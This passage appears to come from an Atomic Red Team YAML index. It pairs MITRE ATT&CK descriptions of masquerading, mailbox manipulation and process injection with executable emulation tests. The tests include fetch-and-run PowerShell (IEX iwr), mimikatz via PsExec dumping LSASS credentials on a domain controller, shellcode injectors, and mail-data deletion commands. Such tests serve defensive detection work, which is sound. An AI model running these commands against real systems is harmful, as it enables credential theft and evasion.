Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Oleg Kolesnikov, Securonix
- Nick Carr, Mandiant
- David Lu, Tripwire
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.8'
identifier: T1036
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or
SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
executor:
command: "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process
\"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\"
| out-null"
cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction
silentlycontinue
name: powershell
- name: Malware Masquerading and Execution from Zip File
auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
description: When the file is unzipped and the README.cmd file opened, it executes
and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique
[as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip")
{exit 0} else {exit 1}
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-ErrorAction ignore -Force | Out-Null\nInvoke-WebRequest #{url} -OutFile
\"PathToAtomicsFolder\\..\\ExternalPayloads\\T1036.zip\" \n"
executor:
command: |-
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore
name: powershell
T1070.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--438c967d-3996-4870-bfc2-3954752a1927
created: '2022-07-08T21:04:03.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/008
external_id: T1070.008
- source_name: Volexity SolarWinds
description: Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds
Compromise to Breach Organizations. Retrieved December 29, 2020.
url: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
- source_name: Cybereason Cobalt Kitty 2017
description: Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December
27, 2018.
url: https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf
- source_name: mailx man page
description: Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual
page. Retrieved June 10, 2022.
url: https://man7.org/linux/man-pages/man1/mailx.1p.html
- source_name: ExchangePowerShell Module
description: Microsoft. (2017, September 25). ExchangePowerShell. Retrieved
June 10, 2022.
url: https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes
- source_name: Microsoft OAuth Spam 2022
description: Microsoft. (2023, September 22). Malicious OAuth applications
abuse cloud email services to spread spam. Retrieved March 13, 2023.
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:56:59.810Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
to export and delete mailbox data via command line tools or use of APIs. Mail
application data can be emails, email metadata, or logs generated by the application
or operating system, such as export requests. \n\nAdversaries may manipulate
emails and mailbox data to remove logs, artifacts, and metadata, such as evidence
of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534),
[Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003)
for command and control, or email-based exfiltration such as [Exfiltration
Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For
example, to remove evidence on Exchange servers adversaries have used the
ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001)
module, including Remove-MailboxExportRequest to remove evidence
of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell
Module) On Linux and macOS, adversaries may also delete emails through a command
line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002)
to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation:
mailx man page)\n\nAdversaries may also remove emails and metadata/headers
indicative of spam or suspicious activity (for example, through the use of
organization-wide transport rules) to reduce the likelihood of malicious emails
being detected by security products.(Citation: Microsoft OAuth Spam 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Office Suite
- Windows
x_mitre_version: '1.2'
identifier: T1070.008
atomic_tests:
- name: Copy and Delete Mailbox Data on Windows
auto_generated_guid: d29f01ea-ac72-4efc-8a15-bea64b77fabf
description: 'Copies and deletes mail data on Windows
'
supported_platforms:
- windows
executor:
command: |
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore
cleanup_command: 'Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"
-Recurse -Force -ErrorAction Ignore
'
name: powershell
elevation_required: true
- name: Copy and Delete Mailbox Data on Linux
auto_generated_guid: 25e2be0e-96f7-4417-bd16-a4a2500e3802
description: 'Copies and deletes mail data on Linux
'
supported_platforms:
- linux
dependencies:
- description: 'Create dummy file in /var/spool/mail/ if no files exist
'
prereq_command: 'if [ -z "$(ls -A /var/spool/mail/)" ]; then exit 1; else
exit 0; fi
'
get_prereq_command: 'if [ -z "$(ls -A /var/spool/mail/)" ]; then touch /var/spool/mail/temp;
fi
'
executor:
command: 'mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*;
do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/;
fi; done && rm -rf /var/spool/mail/copy/*
'
cleanup_command: |
rm -rf /var/spool/mail/copy
if [ -f "$(ls -A /var/spool/mail/temp)" ]; then rm /var/spool/mail/temp; fi
name: bash
elevation_required: true
- name: Copy and Delete Mailbox Data on macOS
auto_generated_guid: 3824130e-a6e4-4528-8091-3a52eeb540f6
description: 'Copies and deletes mail data on macOS
'
supported_platforms:
- macos
executor:
command: |
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
rm -rf ~/Library/Mail/copy/*
cleanup_command: 'rm -rf ~/Library/Mail/copy
'
name: bash
elevation_required: true
- name: Copy and Modify Mailbox Data on Windows
auto_generated_guid: edddff85-fee0-499d-9501-7d4d2892e79b
description: 'Copies and modifies mail data on Windows
'
supported_platforms:
- windows
executor:
command: |
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemType Directory -ErrorAction Ignore
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -Recurse -Force -ErrorAction Ignore }
Get-ChildItem -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -File | ForEach-Object { Add-Content -Path $_.FullName -Value "Modification for Atomic Red Test" -ErrorAction Ignore }
cleanup_command: 'Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"
-Recurse -Force -ErrorAction Ignore
'
name: powershell
elevation_required: true
- name: Copy and Modify Mailbox Data on Linux
auto_generated_guid: 6d99f93c-da56-49e3-b195-163090ace4f6
description: 'Copies and modifies mail data on Linux
'
supported_platforms:
- linux
dependencies:
- description: 'Create dummy file in /var/spool/mail/ if no files exist
'
prereq_command: 'if [ -z "$(ls -A /var/spool/mail/)" ]; then exit 1; else
exit 0; fi
'
get_prereq_command: 'if [ -z "$(ls -A /var/spool/mail/)" ]; then touch /var/spool/mail/temp;
fi
'
executor:
command: 'mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do
if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/;
if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then echo "Modification
for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"; fi;
fi; done
'
cleanup_command: |
rm -rf /var/spool/mail/copy
if [ -f "$(ls -A /var/spool/mail/temp)" ]; then rm /var/spool/mail/temp; fi
name: bash
elevation_required: true
- name: Copy and Modify Mailbox Data on macOS
auto_generated_guid: 8a0b1579-5a36-483a-9cde-0236983e1665
description: 'Copies and modifies mail data on macOS
'
supported_platforms:
- macos
executor:
command: |
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
cleanup_command: 'rm -rf ~/Library/Mail/copy
'
name: bash
elevation_required: true
T1055:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
created: '2017-05-31T21:30:47.843Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055
external_id: T1055
- source_name: GNU Acct
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
url: https://www.gnu.org/software/acct/
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: RHEL auditd
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: ArtOfMemoryForensics
description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
- source_name: Microsoft Sysmon v6 May 2017
description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved
December 13, 2017.
url: https://docs.microsoft.com/sysinternals/downloads/sysmon
- source_name: Chokepoint preload rootkits
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:43.053Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
of executing arbitrary code in the address space of a separate live process.
Running code in the context of another process may allow access to the process's
memory, system/network resources, and possibly elevated privileges. Execution
via process injection may also evade detection from security products since
the execution is masked under a legitimate process. \n\nThere are many different
ways to inject code into a process, many of which abuse legitimate functionalities.
These implementations exist for every major OS but are typically platform
specific. \n\nMore sophisticated samples may perform multiple process injections
to segment modules and further evade detection, utilizing named pipes or other
inter-process communication (IPC) mechanisms as a communication channel. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Anastasios Pingios
- Christiaan Beek, @ChristiaanBeek
- Ryan Becwar
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.4'
identifier: T1055
atomic_tests:
- name: Shellcode execution via VBA
auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.
supported_platforms:
- windows
input_arguments:
txt_path:
description: Path to file containing VBA macro to run
type: path
default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
dependency_executor_name: powershell
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
'
- description: '"#{txt_path}" must exist on disk at specified location
'
prereq_command: 'if (Test-Path "#{txt_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{txt_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}" -UseBasicParsing
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
description: |
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
Especially useful against domain controllers in Active Directory environments.
It must be executed in the context of a user who is privileged on remote `machine`.
The effect of `/inject` is explained in
supported_platforms:
- windows
input_arguments:
machine:
description: machine to target (via psexec)
type: string
default: DC1
mimikatz_path:
description: Mimikatz windows executable
type: path
default: "%tmp%\\mimikatz\\x64\\mimikatz.exe"
psexec_path:
description: Path to PsExec
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe
dependency_executor_name: powershell
dependencies:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
'
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\"
-UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl
= (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url
| where-object { $_.endswith(\".zip\") }\n$mimikatz_exe = cmd /c echo #{mimikatz_path}\n$basePath
= Split-Path $mimikatz_exe | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\"
$basePath\n"
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
'
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "#{psexec_path}" -Force
executor:
command: '"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
/inject /id:500" "exit"
'
name: command_prompt
elevation_required: false
- name: Section View Injection
auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178
description: "This test creates a section object in the local process followed
by a local section view.\nThe shellcode is copied into the local section view
and a remote section view is created in the target process, pointing to the
local section view. \nA thread is then created in the target process, using
the remote section view as start address.\n"
supported_platforms:
- windows
executor:
command: |
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"
cleanup_command: Stop-Process $notepad.pid
name: powershell
- name: Dirty Vanity process Injection
auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
description: "This test used the Windows undocumented remote-fork API RtlCreateProcessReflection
to create a cloned process of the parent process\nwith shellcode written in
its memory. The shellcode is executed after being forked to the child process.
The technique was first presented at \nBlackHat Europe 2022. Shellcode will
open a messsage box and a notepad.\n"
supported_platforms:
- windows
input_arguments:
pid:
description: Parent process ID
type: string
default: "(Start-Process calc.exe -PassThru).Id"
executor:
command: 'Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe"
#{pid}
'
cleanup_command: Get-Process -Name calc, CalculatorApp -ErrorAction SilentlyContinue
| Stop-Process -Force
name: powershell
elevation_required: false
- name: Read-Write-Execute process Injection
auto_generated_guid: '0128e48e-8c1a-433a-a11a-a5387384f1e1'
description: "This test exploited the vulnerability in legitimate PE formats
where sections have RWX permission and enough space for shellcode.\nThe RWX
injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory,
thus evading detection mechanisms \nthat relied on API call sequences and
heuristics. The RWX injection utilises API call sequences: LoadLibrary -->
GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.\nThe
injected shellcode will open a message box and a notepad.\nRWX Process Injection,
also known as MockingJay, was introduced to the security community by SecurityJoes.\nMore
details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.\nThe
original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.\n"
supported_platforms:
- windows
input_arguments:
vuln_dll:
description: vulnerable DLL
type: path
default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
dependency_executor_name: powershell
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{vuln_dll})
'
prereq_command: 'if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
executor:
command: |
$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
- name: Process Injection with Go using UuidFromStringA WinAPI
auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
memory is allocated on the heap and does not use commonly suspicious APIs
such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
(https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
\n - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
\ - https://twitter.com/_CPResearch_/status/1352310521752662018\n - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: Process Injection with Go using EtwpCreateEtwThread WinAPI
auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
within the application's process.\nThis program loads the DLLs and gets a
handle to the used procedures itself instead of using the windows package
directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
macro to copy the shellcode to the allocated memory space\n3. Change the memory
page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
on shellcode address\n5. Call WaitForSingleObject so the program does not
end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
References: \n - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
\ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
description: "Executes shellcode in a remote process.\n\nSteps taken with this
technique\n1. Get a handle to the target process\n2. Allocate memory for the
shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
Use the WriteProcessMemory to copy the shellcode to the allocated memory space
in the remote process\n4. Change the memory page permissions to Execute/Read
with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
References: \n - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process spawned
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
- name: Remote Process Injection with Go using CreateRemoteThread WinAPI
auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
description: |
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
Steps taken with this technique
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
- References:
- https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process spawned
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
- name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
description: |
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process spawned
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
- name: Process Injection with Go using CreateThread WinAPI
auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
description: |
This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: Process Injection with Go using CreateThread WinAPI (Natively)
auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
description: |
This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: UUID custom process Injection
auto_generated_guid: '0128e48e-8c1a-433a-a11a-a5304734f1e1'
description: |
The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread
The injected shellcode will open a message box and a notepad.
Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
Concept from: http://ropgadget.com/posts/abusing_win_functions.html
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1055\bin\x64\uuid_injection.exe
dependency_executor_name: powershell
dependencies:
- description: 'Portable Executable to inject must exist at specified location
(#{exe_binary})
'
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
